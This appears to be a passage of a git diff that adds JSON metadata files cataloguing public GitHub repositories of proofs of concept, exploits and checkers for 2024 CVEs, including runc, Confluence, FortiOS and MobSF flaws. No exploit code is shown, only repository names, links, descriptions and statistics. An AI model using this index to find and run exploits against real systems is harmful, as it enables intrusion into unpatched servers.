+ }, + { + "id": 751649154, + "name": "CVE-2024-21626-POC", + "full_name": "Wall1e\/CVE-2024-21626-POC", + "owner": { + "login": "Wall1e", + "id": 46126287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46126287?v=4", + "html_url": "https:\/\/github.com\/Wall1e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wall1e\/CVE-2024-21626-POC", + "description": null, + "fork": false, + "created_at": "2024-02-02T02:51:29Z", + "updated_at": "2024-07-05T07:05:37Z", + "pushed_at": "2024-02-02T09:49:34Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751664848, + "name": "CVE-2024-21626", + "full_name": "cdxiaodong\/CVE-2024-21626", + "owner": { + "login": "cdxiaodong", + "id": 84082748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4", + "html_url": "https:\/\/github.com\/cdxiaodong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2024-21626", + "description": "CVE-2024-21626-poc-research-Reappearance-andtodo", + "fork": false, + "created_at": "2024-02-02T03:56:03Z", + "updated_at": "2024-04-21T01:29:16Z", + "pushed_at": "2024-02-02T04:56:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 751707713, + "name": "CVE-2024-21626", + "full_name": "zhangguanzhang\/CVE-2024-21626", + "owner": { + "login": "zhangguanzhang", + "id": 18641678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18641678?v=4", + "html_url": "https:\/\/github.com\/zhangguanzhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhangguanzhang\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-02-02T06:34:16Z", + "updated_at": "2024-02-05T19:02:10Z", + "pushed_at": "2024-02-02T09:53:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 751817784, + "name": "CVE-2024-21626-demo", + "full_name": "laysakura\/CVE-2024-21626-demo", + "owner": { + "login": "laysakura", + "id": 498788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/498788?v=4", + "html_url": "https:\/\/github.com\/laysakura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laysakura\/CVE-2024-21626-demo", + "description": "Container Runtime Meetup #5 のLT用のデモ", + "fork": false, + "created_at": "2024-02-02T11:51:08Z", + "updated_at": "2024-04-17T13:23:55Z", + "pushed_at": "2024-02-02T14:33:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 753221669, + "name": "CVE-2024-21626-runcPOC", + "full_name": "V0WKeep3r\/CVE-2024-21626-runcPOC", + "owner": { + "login": "V0WKeep3r", + "id": 78677532, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78677532?v=4", + "html_url": "https:\/\/github.com\/V0WKeep3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V0WKeep3r\/CVE-2024-21626-runcPOC", + "description": null, + "fork": false, + "created_at": "2024-02-05T17:47:01Z", + "updated_at": "2024-10-11T12:42:21Z", + "pushed_at": "2024-02-05T19:12:00Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765630308, + "name": "CVE-2024-21626", + "full_name": "abian2\/CVE-2024-21626", + "owner": { + "login": "abian2", + "id": 156372457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156372457?v=4", + "html_url": "https:\/\/github.com\/abian2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abian2\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-03-01T09:58:50Z", + "updated_at": "2024-06-03T17:15:22Z", + "pushed_at": "2024-06-03T17:15:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 772512207, + "name": "CVE-2024-21626", + "full_name": "Sk3pper\/CVE-2024-21626", + "owner": { + "login": "Sk3pper", + "id": 13051136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13051136?v=4", + "html_url": "https:\/\/github.com\/Sk3pper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sk3pper\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-03-15T10:38:27Z", + "updated_at": "2024-11-10T17:55:38Z", + "pushed_at": "2024-11-10T17:55:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781441452, + "name": "CVE-2024-21626", + "full_name": "KubernetesBachelor\/CVE-2024-21626", + "owner": { + "login": "KubernetesBachelor", + "id": 162622196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162622196?v=4", + "html_url": "https:\/\/github.com\/KubernetesBachelor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KubernetesBachelor\/CVE-2024-21626", + "description": "POC", + "fork": false, + "created_at": "2024-04-03T11:45:19Z", + "updated_at": "2024-08-05T17:01:03Z", + "pushed_at": "2024-04-11T15:23:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 784647452, + "name": "cve-2024-21626", + "full_name": "dorser\/cve-2024-21626", + "owner": { + "login": "dorser", + "id": 20969462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20969462?v=4", + "html_url": "https:\/\/github.com\/dorser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorser\/cve-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-04-10T09:12:06Z", + "updated_at": "2024-05-01T19:07:43Z", + "pushed_at": "2024-04-16T18:47:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 847346997, + "name": "CVE-2024-21626", + "full_name": "FlojBoj\/CVE-2024-21626", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2024-21626", + "description": null, + "fork": false, + "created_at": "2024-08-25T15:11:42Z", + "updated_at": "2024-09-03T13:34:42Z", + "pushed_at": "2024-09-02T07:56:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884775064, + "name": "CVE-2024-21626-old-docker-versions", + "full_name": "Sk3pper\/CVE-2024-21626-old-docker-versions", + "owner": { + "login": "Sk3pper", + "id": 13051136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13051136?v=4", + "html_url": "https:\/\/github.com\/Sk3pper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sk3pper\/CVE-2024-21626-old-docker-versions", + "description": null, + "fork": false, + "created_at": "2024-11-07T11:17:45Z", + "updated_at": "2024-11-08T14:53:54Z", + "pushed_at": "2024-11-08T14:53:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892837460, + "name": "little-joke", + "full_name": "adaammmeeee\/little-joke", + "owner": { + "login": "adaammmeeee", + "id": 72557819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72557819?v=4", + "html_url": "https:\/\/github.com\/adaammmeeee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adaammmeeee\/little-joke", + "description": "Some scripts to simulate an attack (used for CVE-2024-21626)", + "fork": false, + "created_at": "2024-11-22T21:55:11Z", + "updated_at": "2024-11-22T23:37:00Z", + "pushed_at": "2024-11-22T23:36:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21633.json b/2024/CVE-2024-21633.json new file mode 100644 index 0000000000..55887e7745 --- /dev/null +++ b/2024/CVE-2024-21633.json @@ -0,0 +1,33 @@ +[ + { + "id": 740220878, + "name": "CVE-2024-21633", + "full_name": "0x33c0unt\/CVE-2024-21633", + "owner": { + "login": "0x33c0unt", + "id": 26827438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26827438?v=4", + "html_url": "https:\/\/github.com\/0x33c0unt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x33c0unt\/CVE-2024-21633", + "description": "MobSF Remote code execution (via CVE-2024-21633)", + "fork": false, + "created_at": "2024-01-07T21:34:09Z", + "updated_at": "2024-11-25T16:32:58Z", + "pushed_at": "2024-01-07T21:34:51Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 79, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21644.json b/2024/CVE-2024-21644.json new file mode 100644 index 0000000000..6c4bc76907 --- /dev/null +++ b/2024/CVE-2024-21644.json @@ -0,0 +1,33 @@ +[ + { + "id": 779492951, + "name": "CVE-2024-21644-Poc", + "full_name": "ltranquility\/CVE-2024-21644-Poc", + "owner": { + "login": "ltranquility", + "id": 118518854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118518854?v=4", + "html_url": "https:\/\/github.com\/ltranquility", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ltranquility\/CVE-2024-21644-Poc", + "description": null, + "fork": false, + "created_at": "2024-03-30T01:00:31Z", + "updated_at": "2024-03-30T01:07:26Z", + "pushed_at": "2024-03-30T01:08:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21683.json b/2024/CVE-2024-21683.json new file mode 100644 index 0000000000..1d02f7ad29 --- /dev/null +++ b/2024/CVE-2024-21683.json @@ -0,0 +1,161 @@ +[ + { + "id": 804651510, + "name": "-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "full_name": "r00t7oo2jm\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "owner": { + "login": "r00t7oo2jm", + "id": 90321909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90321909?v=4", + "html_url": "https:\/\/github.com\/r00t7oo2jm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00t7oo2jm\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "description": "This vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on a vulnerable Confluence server. The vulnerability exists due to an improper validation of user-supplied input in the Confluence REST API. This allows an attacker to inject malicious code into the Confluence server, which can then be executed by the server", + "fork": false, + "created_at": "2024-05-23T02:10:24Z", + "updated_at": "2024-06-27T15:54:54Z", + "pushed_at": "2024-05-22T22:15:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 804784650, + "name": "CVE-2024-21683-RCE", + "full_name": "W01fh4cker\/CVE-2024-21683-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-21683-RCE", + "description": "CVE-2024-21683 Confluence Post Auth RCE", + "fork": false, + "created_at": "2024-05-23T09:05:40Z", + "updated_at": "2024-11-21T05:23:34Z", + "pushed_at": "2024-05-27T03:47:36Z", + "stargazers_count": 123, + "watchers_count": 123, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2024-21683", + "redteam" + ], + "visibility": "public", + "forks": 33, + "watchers": 123, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805211624, + "name": "-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "full_name": "absholi7ly\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server", + "description": "This vulnerability could allow an attacker to take complete control of a vulnerable Confluence server. This could allow the attacker to steal data, modify data, or disrupt the availability of the server.", + "fork": false, + "created_at": "2024-05-24T05:38:18Z", + "updated_at": "2024-08-13T09:36:06Z", + "pushed_at": "2024-05-24T05:56:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806526029, + "name": "CVE-2024-21683-RCE", + "full_name": "phucrio\/CVE-2024-21683-RCE", + "owner": { + "login": "phucrio", + "id": 83689890, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83689890?v=4", + "html_url": "https:\/\/github.com\/phucrio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phucrio\/CVE-2024-21683-RCE", + "description": null, + "fork": false, + "created_at": "2024-05-27T11:14:54Z", + "updated_at": "2024-05-27T11:26:45Z", + "pushed_at": "2024-05-27T11:26:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810286209, + "name": "CVE-2024-21683", + "full_name": "xh4vm\/CVE-2024-21683", + "owner": { + "login": "xh4vm", + "id": 87658711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87658711?v=4", + "html_url": "https:\/\/github.com\/xh4vm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xh4vm\/CVE-2024-21683", + "description": null, + "fork": false, + "created_at": "2024-06-04T12:00:00Z", + "updated_at": "2024-06-07T06:56:53Z", + "pushed_at": "2024-06-05T13:22:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21689.json b/2024/CVE-2024-21689.json new file mode 100644 index 0000000000..5f53d8d3a8 --- /dev/null +++ b/2024/CVE-2024-21689.json @@ -0,0 +1,33 @@ +[ + { + "id": 846617835, + "name": "CVE-2024-21689", + "full_name": "salvadornakamura\/CVE-2024-21689", + "owner": { + "login": "salvadornakamura", + "id": 179244851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179244851?v=4", + "html_url": "https:\/\/github.com\/salvadornakamura", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/salvadornakamura\/CVE-2024-21689", + "description": "CVE-2024–21689 RCE Bamboo Data Center and Server Atlassian POC", + "fork": false, + "created_at": "2024-08-23T15:32:50Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-23T15:35:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2169.json b/2024/CVE-2024-2169.json new file mode 100644 index 0000000000..1898ca8bf6 --- /dev/null +++ b/2024/CVE-2024-2169.json @@ -0,0 +1,33 @@ +[ + { + "id": 776691365, + "name": "G3-Loop-DoS", + "full_name": "douglasbuzatto\/G3-Loop-DoS", + "owner": { + "login": "douglasbuzatto", + "id": 10249957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10249957?v=4", + "html_url": "https:\/\/github.com\/douglasbuzatto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/douglasbuzatto\/G3-Loop-DoS", + "description": "This Python script automates the process of scanning for systems potentially vulnerable to the Loop DoS attack and the hypothetical CVE-2024-2169 vulnerability. It focuses on scanning ports associated with protocols susceptible to denial-of-service (DoS) attacks. The script can be used for educational purposes or authorized penetration testing.", + "fork": false, + "created_at": "2024-03-24T07:53:52Z", + "updated_at": "2024-11-06T16:58:54Z", + "pushed_at": "2024-03-24T08:00:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21733.json b/2024/CVE-2024-21733.json new file mode 100644 index 0000000000..4a3453be60 --- /dev/null +++ b/2024/CVE-2024-21733.json @@ -0,0 +1,33 @@ +[ + { + "id": 842879414, + "name": "CVE-2024-21733", + "full_name": "LtmThink\/CVE-2024-21733", + "owner": { + "login": "LtmThink", + "id": 110249505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110249505?v=4", + "html_url": "https:\/\/github.com\/LtmThink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LtmThink\/CVE-2024-21733", + "description": "一个验证对CVE-2024-21733", + "fork": false, + "created_at": "2024-08-15T09:47:32Z", + "updated_at": "2024-11-22T17:11:07Z", + "pushed_at": "2024-08-16T05:52:08Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21754.json b/2024/CVE-2024-21754.json new file mode 100644 index 0000000000..f56a8e350e --- /dev/null +++ b/2024/CVE-2024-21754.json @@ -0,0 +1,33 @@ +[ + { + "id": 821072135, + "name": "CVE-2024-21754-Forti-RCE", + "full_name": "CyberSecuritist\/CVE-2024-21754-Forti-RCE", + "owner": { + "login": "CyberSecuritist", + "id": 174053555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174053555?v=4", + "html_url": "https:\/\/github.com\/CyberSecuritist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberSecuritist\/CVE-2024-21754-Forti-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-27T18:52:06Z", + "updated_at": "2024-09-16T16:57:36Z", + "pushed_at": "2024-06-27T19:16:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21762.json b/2024/CVE-2024-21762.json new file mode 100644 index 0000000000..78ff094731 --- /dev/null +++ b/2024/CVE-2024-21762.json @@ -0,0 +1,219 @@ +[ + { + "id": 764866619, + "name": "cve-2024-21762-check", + "full_name": "BishopFox\/cve-2024-21762-check", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/cve-2024-21762-check", + "description": "Safely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762", + "fork": false, + "created_at": "2024-02-28T21:16:10Z", + "updated_at": "2024-11-20T16:30:41Z", + "pushed_at": "2024-07-05T09:37:05Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 93, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 770363870, + "name": "CVE-2024-21762-Checker", + "full_name": "cleverg0d\/CVE-2024-21762-Checker", + "owner": { + "login": "cleverg0d", + "id": 108401157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4", + "html_url": "https:\/\/github.com\/cleverg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2024-21762-Checker", + "description": "This script performs vulnerability scanning for CVE-2024-21762, a Fortinet SSL VPN remote code execution vulnerability. It checks whether a given server is vulnerable to this CVE by sending specific requests and analyzing the responses.", + "fork": false, + "created_at": "2024-03-11T12:28:05Z", + "updated_at": "2024-11-18T14:52:52Z", + "pushed_at": "2024-03-25T11:28:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 771422074, + "name": "CVE-2024-21762", + "full_name": "h4x0r-dz\/CVE-2024-21762", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-21762", + "description": "out-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability ", + "fork": false, + "created_at": "2024-03-13T09:17:28Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-03-16T00:35:12Z", + "stargazers_count": 124, + "watchers_count": 124, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 124, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 771765194, + "name": "CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check", + "full_name": "r4p3c4\/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check", + "owner": { + "login": "r4p3c4", + "id": 111358086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4", + "html_url": "https:\/\/github.com\/r4p3c4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check", + "description": "Chequea si tu firewall es vulnerable a CVE-2024-21762 (RCE sin autenticación)", + "fork": false, + "created_at": "2024-03-13T22:57:00Z", + "updated_at": "2024-11-19T18:50:22Z", + "pushed_at": "2024-03-24T22:01:21Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773292574, + "name": "CVE-2024-21762", + "full_name": "d0rb\/CVE-2024-21762", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21762", + "description": "The PoC demonstrates the potential for remote code execution by exploiting the identified security flaw.", + "fork": false, + "created_at": "2024-03-17T09:15:22Z", + "updated_at": "2024-10-29T16:36:33Z", + "pushed_at": "2024-03-17T09:20:35Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817578503, + "name": "cve-2024-21762-checker", + "full_name": "rdoix\/cve-2024-21762-checker", + "owner": { + "login": "rdoix", + "id": 59075479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59075479?v=4", + "html_url": "https:\/\/github.com\/rdoix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rdoix\/cve-2024-21762-checker", + "description": null, + "fork": false, + "created_at": "2024-06-20T02:58:02Z", + "updated_at": "2024-06-20T10:27:38Z", + "pushed_at": "2024-06-20T03:41:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893344306, + "name": "cve-2024-21762-poc", + "full_name": "XiaomingX\/cve-2024-21762-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-21762-poc", + "description": "CVE-2024-21762 是 Fortinet 公司的 FortiOS 和 FortiProxy 产品中的一个严重漏洞,存在于其 SSL VPN 组件中。", + "fork": false, + "created_at": "2024-11-24T07:20:45Z", + "updated_at": "2024-11-27T16:15:36Z", + "pushed_at": "2024-11-24T08:07:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21793.json b/2024/CVE-2024-21793.json new file mode 100644 index 0000000000..4376c0288d --- /dev/null +++ b/2024/CVE-2024-21793.json @@ -0,0 +1,33 @@ +[ + { + "id": 798058447, + "name": "CVE-2024-21793", + "full_name": "FeatherStark\/CVE-2024-21793", + "owner": { + "login": "FeatherStark", + "id": 42148584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4", + "html_url": "https:\/\/github.com\/FeatherStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2024-21793", + "description": null, + "fork": false, + "created_at": "2024-05-09T02:31:13Z", + "updated_at": "2024-05-09T02:32:23Z", + "pushed_at": "2024-05-09T02:32:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2188.json b/2024/CVE-2024-2188.json new file mode 100644 index 0000000000..13471c566b --- /dev/null +++ b/2024/CVE-2024-2188.json @@ -0,0 +1,33 @@ +[ + { + "id": 858787838, + "name": "CVE-2024-2188", + "full_name": "hacefresko\/CVE-2024-2188", + "owner": { + "login": "hacefresko", + "id": 47251535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47251535?v=4", + "html_url": "https:\/\/github.com\/hacefresko", + "user_view_type": "public" + }, + "html_url": 